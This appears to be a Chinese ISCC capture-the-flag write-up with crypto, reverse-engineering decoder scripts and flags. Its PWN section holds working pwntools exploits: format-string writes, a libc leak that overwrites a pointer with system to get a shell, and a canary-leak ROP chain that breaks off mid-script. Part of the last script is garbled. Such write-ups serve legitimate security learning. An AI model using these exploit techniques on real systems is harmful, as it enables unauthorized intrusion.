9906406334259491146060090196683892489547514234204990430106964503003373179888829787258114325914992191404949463656338508958892876160026312166073788573774288884298018374397303417515521550874150, 
54078365793471170140706398796482723868912019038932006275612991202898210325420801183085594405855422507784857365409739547446932223618994314666308619625607987065241502787668992018127962676453483, 20425258677566388400912100957010635842875551938090144574742090980338723925871671882983711166825955421780045924200051850032551916322744543801463085092679158306683258681851505253236948766096106, 33816927193695390021414032401370645373989155036526734515033932429919806358294318423819171837921987915043087186128426177099169163296711457158104374953267011983220034856739201608000795916220084, 22569299706678947064255422911862640664856797506312373134548043143421083056014082136976443234929238934530769251439415905536981559503030264419438070337446106897917782723316841612257532657185840, 60906061769168077951867268304990727455655069877679725265746099100443735874434337363253226597928623916492866603740428700253802610974356684244729994359250955321825806491119397784967620301958162, 61683560492394868273238752217563827909261070437626043044351411081967771518960115227142799898401153293711484529338725744416210848469542659309555786764343106036543284325064978872324776912148336, 50356345233672398555575161883902863039608856563116994194514401421843004097316661791434165508110209485393309699728137647946332880092630169453933776956614977163140290579875896856914867943995366, 57501896087761221000564375757697136810592110930362342648371860401388353885180289214991062858384258865103093846911709029759241601933198727412147772047933274371847299271752509256524812106942250, 12737830521940166510518732614385010900798810502108660291643561432683743269526526847655249815296395869028388694217745935835462182303969283228700066381443353698625850151497471530674890948180993, 52730525322722654713921376964199238474033765608452650504653597312254899581487280672905721240683884524603750141189731290600453246408181070974974158931451326099247674578886059184134025793063868, 
5832179034817012236650369797643672435211585032058945177743488719550712649689612351275237337336471079142829651870904093420916141481654235729551073585642892827115226656310606860460600288273655, 62535517575239814174667016568701230794852349969893721013796460627994219128629091861568486936466709698436018363828881128925403900911271449183538857896542035146017269134876848846262990161045234, 62674735529087559354407464038166154727326545572349224291590487213027570707946522267599386119190546292564063533831451739927875419572436144686502560587414111351387107075097956297382503773821605, 50231775288091956263035747878014492829481430248806106216294196040661117899719475382706042952817219810195452729807556678800903374695753170238793075426601197698713622896760402323336733722892457, 66016703624038041271066616941982890762300212198964544029720194993794639127975468101951537864014124274077320069820145004837891079794854747265683579064037448180401326235378152083537351893156223, 2496511842088422406097481800700154417846766004058284282880930570445186794868220752320999581794041120993227584166556524200479566958726138416756301263459458317338037665782200880712313529579524, 52646872632807334416860779432858640539375423228734617646469622709212835705722292347344358678684546207133845232106873627106705739596352075500857832725750858846569694186453572113172665960017652, 39646370252597198496565236102395427848407572580777108324794151271108081384633913864988168655760133387616118209994149416248124886441795495337768092942063220264859382839551951956893925922412134, 66763103206507486137915061914140088421709328069132507765797646700896492046866661406014319733770194930344476690676065063551966262168442474623889019282388949237941611205500498651223291756556086, 30905411916496490647412235950903360870799765548925132745231965669523205205526281555385893805493026281813975250361982091674522643825764888431268279695491360788418367996590337791641197136530928, 
36802978383179633045602430175109758511698299036619412838234669610566632506407215718193693455593330403355905832136364706436478063342628406408423151803944813143750407470940914920265832395392001, 60194749394567132016931527223219221042651662116186510587392574598776808636622825172727654207485891941119029919178746441914434963823676756278931330235015964449860965967208494559221500283783040, 23357944960436444392734443389914040506104019640222393290351361988571689390092415558252707718277689369116844128476481036173738922358780605908966379866637105124707173167456714851636013548156739, 14413839339813812319199177166631152261901064711697106835523633830127181361479752535713717720721786075848232234737506977642328333152855488589275858257180278117734620887231016551096332909708647, 63623661091573663419092333077483294513125186988059499936797498945468023816545390708028673599803856000968509633239781485507821105927858868446051126441796952476590488222951683516934788195889963, 47173449672743681102493035677250432660900249391635411883186020982453858441259109812035644083109944719089237624902661190762915664778776463391384519521965033263461250935422119735050908678746124, 23898959454761699951321644342304976175952138299965456468728190477778225149676091931661794316036592189799061007664186888208998219451627854766298682041388770663736583846033670421901199977051411, 56939465507988310684111686507506864403334446260627101558693334520107599582228641195271877482759620303590720056336457467988941316333304541105000907921837480484760039333140714011944997919780636, 57706995827795099322874578236777361637931874707512085328096497850678167529225293754831192001359772520324244402768868076922243301593839657238176101913755401558771628533307197747939433327739357, 59085290173525715274883679181022755626358508525268408133006681403578109907823591218117894685916748218664618156600085708664767942527566222387600125996268497328797162074351708067688299291381563, 
40724438992892642016068593942376539944990640030896442125862163295959034803198543039444007102414294992187153524879384818314714965874051460224743541457322201510121319241395627910136543236765269, 9885341381437913020797374114635635157797978318582858745976562761293377897211673386882866982483379152013393705353804659045661846206847102990751829482196178225485544173780798512708262635703137, 42002669955588701846417038940446418629043958073383584745602327041218973407801520482502048385068132376226181082957198557183099735613370398617648713379368136173014433947040712584842132565864809, 25125663990409955127958261559236512499160636662164598599968685249425762965432303284595504718678127834797999144615563347280922038639955929277491432423108198416295109177311644956378899286345151, 52043232111994440152170692751454337323710074655550707818713027507474996117332369275747048022256132519888015600476206150533420139611662074182758887314859751780004242390813999427167134873641489, 21164222904289898583200820230475470937832140078018589456006171221104992588029054270268844445513562633190468248317703743737856297960575866226387062814079680174853254778194574592880561679849321, 15702484615088500815369257827128964783741741236771912266664290661364568194649397469203268785140713546356732952569078861591717555292723304000727339554606906925957856479912345844412702333471365, 10865661251463028269594251527245143343667168817630466243933504255371484048555805440670555614154552108640243768578016581085840046572631906358622366070304538652262695752078134210026057585627918, 2848803623223996890657483211411398077478034985158329263137805600265521902541279192423825859542373133279622786546289736320500383625468714866606412997145169115584444614405591903631064849794838, 43064052364850657153799843048226216904413929532819108475573315194785770905238536117687580944885663773490036328092028409381170318943961988990509994701842228728111323362261400085835856335640347, 
63990489176463655630916454653915259090817137481628354169177456232363892666174474468571272039198941019634065551588057378319563646786876536038530167422740816457574069025123874247946420378990978, 20536210103644890440196110659064359071736314904570034779280012207392765984806670293915911314747448059549956521041198910598380251418835027301696553899752401455805786429802889562461551573414835, 48688018205736289829437263548318254081521429916953442860256279463165884722368083232628566478243179223565846730779664230689398112194883125689324606238190271377157029330565187921034701085881412, 24650194985355153552198357593808130629042232388997475934142482180581413670301249765850321594340946693817059933786961129401164409678075708675654670414449498423805470300868883980543108273057191, 38162810917870423497415976195550985283843950680529049352287989443837834607427430908386227981760607012468966076309297964621061969525433491089809297256537209996590034089705613494609971414942483, 16106661412350506424003000819671696402573350097591091267469051557299003724836803927381506823541750712076867906278238744458399104508171739612500841120601902731190037252983961964270369478250135, 60717008689247973968781938908566004496180475295144030364468903344435573439513131353777950673379589823683156482940320368719840535307811939182548209068851585456944960601918613118057278691443843, 57882240905969595582166302623532199536967394873129928940872411621111224766922438484933075842178960723921646374080389455787308593783246149991904442287560715779178925080106931972299586979959953, 12061826536513185869260563532670900297362162236282900029931589855777340428534398586928322428305858525536948501230868891250447684672637900859825530841033648726270215853767105468881462766353647, 40973633971153999167540984043398551153130298337916277287184472612550851536816203105848218587839346694510913994031730070798708511216239645963193961083872326468979562529128797727840639098996831, 
25190964043610225574969743147281492438276087947398074376921729347532928885807409753830940977173209614701838033744898224166579262470797747208929440196369133055839958296041729070928084928175397, 23085492771770494644509788889915907342680818144147360119437564563164180950856851904291430723050735715720034055261306070039381175120138832656617084745093517302210431379995787153962673396950446, 1937286375866702470033764597194175817538611841028892680723733464978386442218526149097443771018354033246248121985191264427707436520669150306012229684753815587120632879284603625150768954590725, 57668655807108259615437079174326332892999147524507134641048100122456123589342568481735509156000192574732309053941159985990102188395289859827445761194795514225271513965790503406398879250946020, 35198545820474489569899848069249557859170666517373907458835345371345885779724027455048887305989157801081342610829321715939227090350286603804194859507448972973163229187760810563747030534930096, 2680837408459670214531068863211655690161634979199681308665046291376585209054365216866169377888301551485329985613646031207005581077478836769647505836036847408127664883863678654156379263672346, 12121350007979822308927681064432222683457135471774074095342842220722850481125191571362576595891866927101566205385910418597553030873994196798229835399838952671263905444731701933770406420792121, 4957631799318318039287713537332279724312547937403771431018555605386508208230343165704781613086526046297842296986943480338666436341519107096931707271246707069346795647588239516143515089036499, 35549534355465956154494768947760967550998727688555042974552178207809004983427424921103316720643881947201408505005591186968625102168923059623511112094217632912471836757511264755862703270341997, 52110172792858889942550084958723550101567576170513478250074784092459757017185078051587972765023896269497260859190340089967413958256099639411918402705603770318443799706825579668789545784614306, 
21979260423626821018489541432634891685215725203513830851598610785031805881508993329398466374053154095270019921311344755282533940013298535097200167881351776957252298149312359379466488394766334, 18835091260797073562570197337192687096149062471010909287505026739256851663845652546228812299453403369197090762437909361190694731343103307114750836735997823980817474260923309093351161826331851, 31741489402516148911633197695597953081401237503796854927240741326207504993089377049583728444407858426004232071134468398273396605006577855552656764382734524654277518570822875478167442638070901, 16050117042291126277677926822141336442372387354061686268361792054293011835387201560959594636149809378193176734175577918539778477385651844891098832581022035133541637266082160308042031860506989, 16379463477204913330055508893873729174739376880548770933003570470660499885606594386561420463061184588808230491183336279782405733295425571066874025844316939637315915343557140783536280314260190, 23058007636349322493533060888214863711857942288940601048898840019057943804724486110106459414627162992559209093285612285210308835967706195433862579974709778186744020858324991526063814823612287, 19497548104095059626306207887464394273778151478519542948752215627780389285194991470064485692362185896936181237881579479933106410836542916696923953216719052408411804666552233932131319571241763, 17632121136316990934955612215609500766435472016530990904203129722465440826062961881413835332832993132979526774745855028877553216518081174139693119715949034199141619868897050824712146245401588, 1871468487319968372908785904638027514106261889215980360019125483842603309636049187223167809902816215052058167498138766999050264473961232336492552974671621923732211039196537569962142516042355, 62926073061408568815305709546008876991925602654691545685161680583826362674827494368322825291911250082105230802573121612633252347575715105923975409004163278303768506104733416649687428519800752, 
65500365105957172579636962313973498672764577312979370212418478100944941884490065883379135454667686291049053276049947674376272785046831902692005131485978786748114625044420777348285369514422896, 39442084005803859743248651321324383868223256723271248941942941219329288135436852908442074189537390961087604110496233569348047766997496498099112587487212179108572289958814078996194165124356571, 28749645518483530181191626607360401710965005503452507585402702473101692981830330921977455897406578416614294892273156950031964192568883035130344623321903046909134347294496256397080491610449783, 59215486516688778254818458983882413560832323676510288447057843140104907059498699532075660384822833477717456618622107255774778427073278729948292838400614933795378669974510804626649421793785832, 38239266349865570890118308779334625251415166366089226198270068826789870291975773540805447014702851667297091330678993691371210077982768540678144457713502249064302773372842360541892860517005928, 10781869801098745922189009636686366741026376123099365671761874522828753309010095045974148776576101040476333187616026046251883938367061041869707334631470632264224458586898378761910988484407522, 44555661165298366621929077029890439918460348802513192503445343800607358749326722940430429144066972517739493904631128687734149376126254489721753894732678101106393312221317100067575618291906876, 66419168629567921834343053143841391733067579594096450584346524244338021419929728437472466918227931064432540911955687063794088879714385096689969461262536176954842293004546425098238106744967544, 53070736350010579101478261026664742633830440810518969293809356268130347073700238364938313884976128806691925379909738186549901426616348254114665071229526846834842533859242206037281011591036289, 22849589939655807391095873987864500357112477263503457235954254349498524812852403116832329056488396748162091885144551074568286219666156511990443897994844330670468980085373463662416383618461467, 
7180153334322933025085037204940906254349411631575887280143813253513754261470238096914777722623869792438427552448168780705532068475077894323728119245309544237160824439200585721645590166228420, 11482439014492604534559359091537077661618461698201369584284070129079518511868618757186994516752885928499921289354962724980964253578120911579146839767416018399357811759286441128701879257327409, 13340284240190076852801996978492272593934260994217650388686339010003533927947169352715971012947009755179237313888884967110512743624920673608875707982244817410379882924572291491377414280764504, 16319742011618547561318291933298747389763403441769656204941637523542180357712784347887893270400819572630615616460967210482111595184242129252734239196181783997489879602947364401095934436633840, 25245264191238070106632203778761096089815457066460589468863204041741021444830520840049730272302444433418401417213547796426097383885110343132458212248252538060762962376716059459828802790134118, 4569462007281085626344114509743551095912755602276157412382743883572282836905576946714633114678917034713786819842866758824276969427145784594847589758199664134223615366421110564305852166850756, 16222138934890360286734397616869346119188006403962150947344247922973455683049770004862573585016786313381016665646116773581837505032908893603036889177730855936060000638140423475038765571082437, 27536486649538589838877405800312664596659200874025350885626913317294289481742460638948156829376486168554629725395805255505979788662356489076920425846567848580616902117147138363914943128262868, 19660548836315869980577632085657144304460234727275696562095405800452804952270456690413464091827809646872415608257296548283420857426618514532827157035478615928221980512251880148725239045050572, 2935575951698898266032232265490012685304313227978895061964424259438886204380199162255685722119174179934665079343266063365713050997303256282211640759431768058030092561437103884802603110488026, 
15050391309067926582121418817448212157268553037114604384884318666136444999543717730382845372854181435979402248620494574452171618000054901482776133338676983233450693782357102727495150466680028, 15844239224848276396953918986430334242804023674203926124579340310286053504639009733470273287917036368416360132676495915311526874480593278206185756588598105157038681320484244707469227627438636, 60141538952334547131714083168714853189936401560162514615025382204736687748110514588745620090074870079766772161067031978039680771075103440185765155578539288563622621860106047359168162260844534, 45047381276471250981174619803556224475748621940824687575867936161420399614080749846164595911294933112671467207082180454047497664417895485437634278353614168990051094115123403717078196249807462, 63213628474195584088061650017856358607306056083424690128239046359606799520947289828953816760280214157198463731468395297879555219745776202587009614095816156557391728270483415956231481216684127, 47127670452411541823641342868939225861162646075398727586082968366329064652785940730549374132934052760090536352442764305603139737908099767454603464370232665245220297648297947630663865185956858, 27253024246190707296003159139128937539039294335558161543719274117695143050858801199381756277345531356352915974838147614765883773007952056088797078000243444232563774396178048368410683022243600, 58536339286803714222234300164727185302498750556527460206135534519254767876585761649566526890768447339045289107648373430624328699713491542596523037967861994155279091191591924807670592955011170, 57175551329982920356116680928451690094476558030201982262370861043678283259979647494102980609873273499338588744799175384224575598567727581411955085338869075971019893816832990408113023589210692, 1691228204126640565048609153105718816682391106279130954873266081535994803009983222071629038374948751966597853814710700984986351218672473434401054012842971444924818052453217913126056804136634, 
18259029928340107051612327899051598631621572170439491860737800320015828939423260018800103341952219448169798069021795590884245237859665920663962296060767687499992086244092229454910838687365523, 34275887125068602666708845519395025657705837555812683307610201684446869655870749876133358373069234049138641432900703496298668500973107970893808842807146663365267834946542177020935189486846663, 59478292605909585646382908673223430222120032595326349358553695541323907659346576450864085948860581917387406847299785962961771900629629458942186507337471890453270925234354360840846884207643024, 18471913267399338563212326631641044656181709708944323035056233436403418430332177915960100112418275886822971100478565428197902731068875657494263701867756491180732018002382889213400874919101437, 28419356783698622386038466787527804412812948444393147867606362906428208603221951008262562715703516257770939548500131732375680515310439957569029091346899056154440147332745840385444672517664872, 4708757448340822715920459148813728646061290570953127713098444568688336699702657954376259939408787111187863066857145859213594085300401029256265676556400548573084764170467918774885607183523407, 63035795145332257671110618754242812319412358745570179949829104657791665675480259338228488240452172475363993781946567214140071689730597091676924635337666041026748259004653243201003399276554500, 13189986625164442133210084295476894490640116756733531036044924355555127993186837134306976392035419483325751906098295742029817206682768342920654845357323042907301486682385483087515626774642983, 56479004843147047171593377125630572933044188348660633825638380537481087842510559431561593902889277909735622988511294737943589757547993119607061747602839484836518764277869991350077042440305063])
nbit = len(pubKey)
encoded = (2639622584605651396581817251490032779454497426926835395155361491646809433696877389021382879271034071363673713244579933536498932208083160752102337857045696761077282255141184610061711587402657723)
A =              Matrix(ZZ, nbit + 1, nbit + 1)
for i in range(nbit):
    A[i, i] = 1
for i in range(nbit):
    A[i, nbit] = pubKey[i]
A[nbit, nbit] = -(encoded)

res = A.LLL()
for i in range(0, nbit + 1):
    M = res.row(i).list()
    flag = True
    for m in M:
        if m != 0 and m != 1:
            flag = False
            break
                                                             #print 1
    if flag:
        print (i, M)
                                         #print over
        M = ''.join(str(j) for j in M)
        M = M[:-1]
        M = hex(int(M, 2))[2:-1]
        print (M)

将上述脚本放到 SageMath 在线环境中运行,得到十六进制串,再转成字符串即可得到flag

img

ISCC{Rs3C-zKM5-pIee}

隐秘的信息

img

base64解密得到解压包密码easy_to_find_the_flag,解压之后得到一个图片,lsb通道,提取前两行

img

在线网站https://gchq.github.io/解密得到flagimg

RE

Amy’s Code

附件拉到ida里面,main反编译

image-20220501120411753

sub_4115FF,sub_411433为主要函数。跟进sub_411433

image-20220501120516031

image-20220501120524119

跟进sub_4115FF

image-20220501120814513image-20220501120838415

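# Decoder for the "Amy's Code" check: v9 holds the expected bytes and v6 the
# additive key string, both copied from the decompiled routine.
v6 = 'LWHFUENGDJGEFHYDHIGJ'
v9 = [149,169,137,134,212,188,177,184,177,197,192,179,153,129,196,124,142,174,106,184]

# Step 1: subtract the key character that was added at each position.
# (The intermediate is kept in its own name instead of `str`, so the builtin
# str() stays usable for anything that runs after this script.)
unshifted = [encoded - ord(key_char) for encoded, key_char in zip(v9, v6)]

# Step 2: undo the XOR with the position index.
flag = ''.join(chr(value ^ position) for position, value in enumerate(unshifted))
print(flag)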

image-20220501121303256

Sad Code

main函数反编译

img

from z3 import *
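# Recover the eight integers compared by the decompiled main(): v15 and
# v16[0..6]. The constraints form two independent groups of four linear
# equations (v15 with v16[0..2], and v16[3..6]).
solver = Solver()
v16 = [Int('v16[%d]' % i) for i in range(7)]
v15 = Int('v15')

equations = [
    v16[1] + 7 * v16[0] - 4 * v15 - 2 * v16[2] == 0x1E9CE8CDB,
    5 * v16[2] + 3 * v16[1] - v16[0] - 2 * v15 == 0x13CFADB9E,
    2 * v16[0] + 8 * v16[2] + 10 * v15 - 5 * v16[1] == 0x4CD876232,
    7 * v15 + 15 * v16[0] - 3 * v16[2] - 2 * v16[1] == 0x7CC936A0B,
    15 * v16[3] + 35 * v16[6] - v16[4] - v16[5] == 0x10D543E690,
    38 * v16[5] + v16[3] + v16[6] - 24 * v16[4] == 0x664955F03,
    38 * v16[4] + 32 * v16[3] - v16[5] - v16[6] == 0x13F5455D8A,
    v16[3] + 41 * v16[5] - v16[4] - 25 * v16[6] == 0x41D596666,
]
for equation in equations:
    solver.add(equation)

# check() returns a CheckSatResult object, which is truthy for unsat and
# unknown as well, so the result has to be compared with `sat` explicitly
# before asking for a model.
outcome = solver.check()
if outcome == sat:
    print(solver.model())
else:
    print("no model:", outcome)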

img

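# Turn the solver output back into text. Each recovered integer is written out
# as big-endian bytes; v15 comes first, followed by v16[0..6] in index order.
# int.to_bytes replaces Crypto.Util.number.long_to_bytes so the script runs on
# a plain Python 3 install without pycryptodome.
v15 = 1230193475
v16 = [0]*7
v16[0] = 2068662353
v16[1] = 1180258382
v16[2] = 1261262927
v16[3] = 1447647832
v16[4] = 1112026458
v16[5] = 1346916437
v16[6] = 1515477117


def _int_to_bytes(value):
    """Minimal-length big-endian encoding of a non-negative int (one zero byte for 0)."""
    return value.to_bytes(max(1, (value.bit_length() + 7) // 8), 'big')


flag = b''.join(_int_to_bytes(word) for word in [v15] + v16)
print(flag)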

img

得到ISCC{MHQFYPNK-XOVIZXBH-ZPHPUZTX}

GetTheTable

下载附件,反编译之后base58解码得到答案

img

img

Bob’s Code

首先将附件反编译,审计

img

审计之后发现需要将.W1BqthGbfihKthkzV1tYc.hl5oY5qcbJ3XhXQXXlRoWBWdhRTXORpf1RwoF0.偏移2,使用以下脚本

#include<string.h>
#include<stdio.h>
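/*
 * Shift every ASCII letter of the embedded string back by w positions inside
 * its own case (wrapping around the alphabet) and print the result.
 * Digits and punctuation are printed unchanged.
 */
int main(){
    char s[] = ".W1BqthGbfihKthkzV1tYc.hl5oY5qcbJ3XhXQXXlRoWBWdhRTXORpf1RwoF0.";
    const int w = 2;
    /* Length is computed once; the loop index is size_t so it is compared
       with strlen()'s result without a signed/unsigned mismatch. */
    const size_t len = strlen(s);

    for (size_t i = 0; i < len; ++i)
    {
        if (s[i] >= 'A' && s[i] <= 'Z')
            s[i] = (char)((s[i] - w - 'A' + 26) % 26 + 'A');
        else if (s[i] >= 'a' && s[i] <= 'z')
            s[i] = (char)((s[i] - w - 'a' + 26) % 26 + 'a');
        printf("%c", s[i]);
    }
    return 0;
}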

偏移得到.U1ZorfEzdgfIrfixT1rWa.fj5mW5oazH3VfVOVVjPmUZUbfPRVMPnd1PumD0.然后通过base64码表ABCDEfghijklmnopqrsTUVWXYZabcdeFGHIJKLMNOPQRStuvwxyz0123456789-_解码得到base64加密的内容SVNDQ3tabDR1OTVhRy1nNk8wTUhURi1FTlZkVjMwZn0=,然后解码得到flag

img

ISCC{Zl4u95aG-g6O0MHTF-ENVdV30f}

VigenereLike

附件分析

img

s = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
def My_base64_decode(inputs):
    """Decode a Base64 string with the alphabet in `s` and return it as a str.

    Every character other than '=' is looked up in `s` (a character that is
    not in the alphabet raises ValueError) and turned into a 6-bit group.
    The groups are consumed four at a time; when a chunk is not a whole number
    of bytes, two bits per '=' in the input are cut from its end. One
    "input1" line is printed per chunk, as a progress marker.
    """
    sextets = [format(s.index(symbol), '06b') for symbol in inputs if symbol != '=']
    pad_count = inputs.count('=')
    pieces = []
    for start in range(0, len(sextets), 4):
        bits = "".join(sextets[start:start + 4])
        if len(bits) % 8:
            # Incomplete final chunk: drop the filler bits implied by the padding.
            bits = bits[:-2 * pad_count]
        whole = len(bits) - len(bits) % 8
        pieces.extend(chr(int(bits[k:k + 8], 2)) for k in range(0, whole, 8))
        print("input1")
    return "".join(pieces)
# Alphabet used by the Vigenere-like layer, the ciphertext, the repeating key
# and the 7-byte XOR mask.
a = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"
b = "rJFsLqVyFKYTn2Wgeuo8u Ltm8T0o2wCK9mmCrv="
key = "ISCCYES"
v17 = [1,2,3,4,5,6,7]

# Layer 1: subtract the key character's alphabet position from the ciphertext
# character's position. The trailing '=' of b is left out here and re-appended
# afterwards.
# NOTE(review): the modulus is 63 while `a` has 62 characters, and b contains a
# space that is not in `a` (find() gives -1 for it) — check both against the binary.
shifted = []
for position, cipher_char in enumerate(b[:-1]):
    key_char = key[position % 7]
    shifted.append(a[(a.find(cipher_char) - a.find(key_char) + 63) % 63])
    print("input2")

# Layer 2: Base64-decode the recovered text.
flag = My_base64_decode("".join(shifted) + "=")

# Layer 3: XOR every decoded character with the repeating mask.
flag1 = "".join(chr(ord(char) ^ v17[position % 7]) for position, char in enumerate(flag))
print("ISCC{"+flag1[:-4]+"}")

ISCC{Reverse-8QN61wE6-2SLeGLYX}

Ruststr

附件反编译后找到main,分析之后,针对qmemcpy函数处的数据写个脚本跑一下

img

# XOR mask copied from the binary.
b = [0x9A, 0x78, 0xB6, 0x12, 0xBE, 0x66, 0x8D, 0xCF, 0x51, 0x9E,
     0x63, 0xCB, 0x4A, 0xD1, 0x1A, 0x59, 0x78, 0x1C, 0x17, 0x73,
     0xF2, 0x1D, 0x05, 0x2F, 0xF0, 0xD7, 0xB3, 0x22, 0x5D, 0xAD,
     0x0B, 0xE2]

table="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/="
decode="5EvneNRco/dq9yu7ZJdOCj5LUQePeWBbmw=="

# Every character becomes its table index in binary, at least six digits wide.
# '=' is entry 64 of the table, so each padding character contributes seven bits.
x = "".join(format(table.index(symbol), "06b") for symbol in decode)

# Cut the bit string into whole bytes and echo each one in hex.
c = []
for start in range(0, len(x) - len(x) % 8, 8):
    value = int(x[start:start + 8], 2)
    c.append(value)
    print(hex(value), end=" ")

# Remove the XOR mask; one "1" is printed per processed byte.
m = []
for cipher_byte, mask_byte in zip(c, b):
    m.append(cipher_byte ^ mask_byte)
    print("1")

key = [0x32, 0x63, 0x65, 0x61, 0x39, 0x66, 0x30, 0x34, 0x63, 0x36, 0x33,
       0x62, 0x34, 0x32, 0x38, 0x33, 0x39, 0x34, 0x30, 0x65, 0x63, 0x30,
       0x65, 0x36, 0x64, 0x32, 0x39, 0x62, 0x65, 0x32, 0x38, 0x64]
def lll(a,b):
    """Return 0 when a is strictly greater than b, otherwise -1."""
    return 0 if a > b else -1
# For every masked byte, look for the first candidate below 128 that the
# forward transform maps onto it. The key-dependent term does not change with
# the candidate, so it is evaluated once per position.
f = ''
for target, key_byte in zip(m, key):
    offset = lll((key_byte + 0xd0) & 0xff, 0xa) + 2
    found = next((cand for cand in range(128) if (offset + cand) & 0xff == target), None)
    if found is not None:
        f += chr(found)
        print(f)

# The recovered text is reversed before the final per-character fix-up.
p = list(reversed(f))

print()
def ppp(num):
    """Return True when num is even."""
    return num % 2 == 0
# Final fix-up on the reversed characters:
#   ASCII letters  -> case flipped (XOR 0x20)
#   even digits    -> next character code, odd digits -> previous one
#   anything else  -> left as it is
for index, char in enumerate(p):
    code = ord(char)
    if 'a' <= char <= 'z' or 'A' <= char <= 'Z':
        p[index] = chr(code ^ 0x20)
    elif '0' <= char <= '9':
        p[index] = chr(code + 1) if ppp(code) else chr(code - 1)

print("".join(p), end='')

img

ISCC{Reverse-NgH86-9IHo0}

PWN

create_id

格式化字符串漏洞

img

脚本如下

from pwn import *

# Connect to the challenge service named in the write-up.
r = remote('123.57.69.203',5310)
# The first line sent by the service is a hexadecimal number; the trailing
# newline is cut off and the rest parsed as an integer.
# presumably this is the address of the value the binary checks — confirm in the decompilation
HI = int(r.recvuntil("\n")[:-1],16)

# Three inputs the program reads before it reaches the printf call.
r.sendline('6')
r.sendline('7')
r.sendline('8')

# %9c prints nine characters and %12$n stores that count through the 12th
# printf argument; the packed value of HI travels in the same input.
# NOTE(review): this only works because the program hands user input to
# printf as the format string. Printing it through a constant format
# (printf("%s", buf)) and building with -Wformat-security removes the bug.
r.sendlineafter("\n",b"%9c%12$n"+p32(HI))
# Read the reply up to the closing brace of the flag.
result = r.recvuntil("}")

print(result)

img

ISCC{0d11-0757-4e20-805a-e0a3}

sim_treasure

分析sp1附件,循环类型格式化字符串

img

脚本如下:

from pwn import *
context(arch='i386')

r = remote('123.57.69.203',7010)

elf = ELF(binary)

libc = elf.libc

offset = 6

r.recvuntil("Can you find the magic word?\n")
r.sendline('%35$p')
libc_base = int(r.recvuntil(b'\n')[:-1],16)-libc.symbols['__libc_start_main']-241
system = libc_base+libc.symbols['system']
sh = libc_base+0x17E3CF
success(hex(libc_base))

r.sendline('%2$p')
eip_addr = int(r.recvuntil(b'\n')[:-1],16)+4
r.sendline('%3$p')
code_addr = int(r.recvuntil(b'\n')[:-1],16)-0x16CA
success(hex(code_addr))

payload = fmtstr_payload(offset,{code_addr+0x2A60:system})

r.sendline(payload)
r.send(b'/bin/sh\x00')

sleep(0.3)
r.sendline('cat flag')

r.interactive()

ISCC{1127-c2c2-4f8a-a0a7-e630}

跳一跳

img

__readfsqword函数,直觉告诉我应该是泄露Canary,脚本如下

from pwn import *
from LibcSearcher import LibcSearcher

context(os="linux", arch="amd64", log_level="debug")


l32 = lambda                                                                          :u32(sh.recvuntil("\x7f")[-4:].ljust(4,"\x00"))
l64 = lambda                                                                          :u64(sh.recvuntil("\x7f")[-6:].ljust(8,"\x00"))

leak= lambda name,data                               :sh.success(name + ": 0x%x" % data)

sa  = lambda a,b     
s                  = lambda payload                        :sh.send( payload)
:sh.sendafter(str(a),str(b))
sl  = lambda payload                                    :sh.sendline(payload )
sla = lambda a,b                                                :sh.sendlineafter(str (a),str(b))

r   = lambda numb=4096                   :sh.recv(numb)
ru  = lambda a                                                                     :sh.recvuntil(str(a))
rl                 = lambda                                                                                 :sh.recvline()
uu32= lambda data                                         :u32(data.ljust(4, b'\x00'))
uu64= lambda data                                         :u64(data.ljust(8, b'\x00'))
                    print("success")

def b(addr):
                    bk="b *$rebase("+str(addr)+")" #pie
                    attach(sh,bk+"\nc")
                    success("attach")

filename = "pwn"
elf = ELF("./pwn")
def pwn(ip,port,debug,remote_libc , local_libc):
                    global sh
                    # global libc     
                    if(debug == 1):
                                         sh = process("./{}".format(filename))
                                         # sh = process("", env={"LD_PRELOAD": libc_path})
                                         #  p=process(["ld.so","./goal"],env={"LD_PRELOAD":"libc.so"}, stdout=stdout, stdin= stdin)
                                         libc = local_libc
                    else:
                                         sh = remote(ip,port)
                                         libc = remote_libc
                    # sh.timeout =   0.1
                    #b(0x1217) #printf



                    ru("of pwn~")

                    for i in range(0xd8+1):
                                         #sleep(0.01)
                                         sl(b"210")
                    s(b'a')

                    
                    print("success")

                    ru("input: ")
                    data = r()
                    print("data==>",data)


                    canary_int = u64(data[-13:-6].rjust(8,b"\x00"))#data[-8:]
                    print("__canary==>",hex(canary_int),type(canary_int))  

                    instant_rsp = u64(data[-6:].ljust(8,b"\x00"))
                    print("instant_rsp==>",hex(instant_rsp))


                    read = 0x121c
                    # print( rbp - 0xe0)                                                                                                                                                                                                                                
                    s((0xe0-0x8 )*b"a"  + p64(canary_int) +  p64(instant_rsp + 0xe0) +p8(0x01))
                    ru("input: ")
                    data = r()
                    A_elfaddr = u64(data[-6:].ljust(8,b"\x00"))#;print("A_elfaddr==>",hex(A_elfaddr))
                    pie = A_elfaddr - 0x12b0
                    elf_bss = elf.bss() + pie;data = elf_bss + 0x330

                    read = pie + read
                    buf = b"a"*(0xe0-8);canary = canary_int;rbp = data;rip = read
                    print("data = rbp1/rsp1=>",hex(rbp),"rip1=>",hex(rip))
                    s(buf + p64(canary) + p64(rbp) + p64(rip) )

                    ret = 0x1016 + pie
                    pop_rdi_ret = 0x130b + pie
                    leave_ret = 0x124A + pie
                    puts_got = elf.got["puts"] + pie;puts_plt = elf.plt["puts"] + pie
                    read_got = elf.got["read"] + pie;read_plt = elf.plt["read"] + pie
                    printf_got = elf.got["printf"] + pie;setbuf_got = elf.got['setbuf']


                    next_read_ptr = data + 0x200 ;print("rbp3=next_read_ptr",hex(next_read_ptr))
                    print("rsp=>",hex(data+0x8))
                    rop = p64(next_read_ptr)

                    rop +=p64(pop_rdi_ret)+p64(puts_got)+p64(puts_plt)
                    rop += p64(pop_rdi_ret)+p64(read_got)+p64(puts_plt)
                    rop += p64(pop_rdi_ret)+p64(printf_got)+p64(puts_plt)
                    
                    rop += p64(ret)+ p64(read)+p64(leave_ret)
                    rop += p64(canary)*int(27 - 13)
                                         
                    buf = rop;canary = canary_int;rbp = data-0xe0;rip = leave_ret

                    print("next_read_ptr = rbp2",hex(rbp),"rip2=>",hex(rip))
                    s(buf + p64(canary) + p64(rbp) + p64(rip))

                    raw_input()

                    puts_addr = u64(r(7)[-7:-1].ljust(8,b"\x00")) ;leak("puts_addr",puts_addr)
